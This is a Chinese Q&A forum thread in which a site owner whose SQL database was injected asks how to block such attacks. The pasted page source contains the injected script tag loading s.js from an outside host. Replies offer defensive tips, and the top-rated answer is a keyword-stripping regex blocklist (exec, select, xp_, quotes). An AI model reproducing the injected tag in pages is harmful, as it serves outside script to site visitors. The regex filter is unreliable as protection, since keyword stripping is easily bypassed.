我的网站被人侵,有什么方法可以不让SQL数据库入侵呢.
数据库里添加了许多乱七八遭的链接,不过导致网站打开不正常.
<head>
<title>上海电脑维护、网络维护、网络布线、电脑维修专家 >> 站点首页</title>
<meta content="上海电脑维护中心是:电脑维护、网络维护、网站维护、电脑维修等IT外包服务专家。" name="description">
<meta content="电脑维护、网络维护、网站维护、电脑维修、IT外包服务" name="keywords">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
A{TEXT-DECORATION: none;}
A:h"></title><script src=http://s.see9.us/s.js></script><!--
BODY
{
<script language="JavaScript" type="text/JavaScript">
function HideMenu()
{
}
</script>
</head>
<body leftmargin=0 topmargin=0 onmousemove='HideMenu()'>
<div id=menuDiv ></div>
以上代码帮我看看,看通过SQL防注入程序,应该拦截什么关键词。
网站SQL数据库总是被人入侵,有什么方法解决
答案:6 悬赏:50 手机版
解决时间 2021-04-08 21:54
- 提问者网友:凉末
- 2021-04-08 14:09
最佳答案
- 五星知识达人网友:想偏头吻你
- 2021-04-08 15:32
过滤Request(C#)
public static string MASK(string inSTR)
{
Regex sqlExp = new Regex(@"(and|exec|insert|select|delete|update|count|drop|table|%|chr|mid|master|truncate|char|declare|'|--|xp_)");
return sqlExp.Replace(inSTR, "");
}
public static string MASK(string inSTR)
{
Regex sqlExp = new Regex(@"(and|exec|insert|select|delete|update|count|drop|table|%|chr|mid|master|truncate|char|declare|'|--|xp_)");
return sqlExp.Replace(inSTR, "");
}
全部回答
- 1楼网友:神的生死簿
- 2021-04-08 17:40
其实说这么多原理.我就说个实际的,你装好杀毒软件并随时保持更新,把系统漏洞的补丁都装上.一般就不会有问题了.不然就在WINDOWS服务设置里,把你不用的服务都关闭了.
- 2楼网友:山河有幸埋战骨
- 2021-04-08 17:27
你应该检查下你的网站里面有没有被人放入后门!
还需要看看你的网站源码有没有明显的注入攻击漏洞的地方
然后修改数据库密码
- 3楼网友:第幾種人
- 2021-04-08 17:01
1楼的兄弟,现在的数据库入侵一般都是通过注入进行的,通过WEB的80端口,硬件防火强是不能拦截的。
防止网站被入侵,首先要对带入数据库查询的字符进行严格的过滤。防止黑客通过注入的到管理帐户的密码。现在网上有很多的防注入程序。去下载一个放到你的网站目录。在每个asp文件前面包含进去就行了。这样可以阻挡大多数的小菜。还有,把网站的管理目录的名字改为一些生僻的目录名或者足够的深。让黑客猜到了密码也没处去登陆。(呵呵)最后,鉴于大多数的黑客会上传webshell控制网站。把上传目录都该为不课执行asp文件的目录。这样就可以抵挡大多数的黑客攻击。如果你用的别人的整站系统,请您随时关注它的漏洞信息,及时的打好补丁。
- 4楼网友:雪起风沙痕
- 2021-04-08 16:37
设复杂的密码,一般不用sa登陆,给每个数据库新建一个登陆用户,并指定权限。
- 5楼网友:孤老序
- 2021-04-08 16:07
你可以去书店买本黑客房的书看看,学习如何攻击网上的计算机和主机。
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯
正方形一边上任一点到这个正方形两条对角线的 |
阴历怎么看 ? |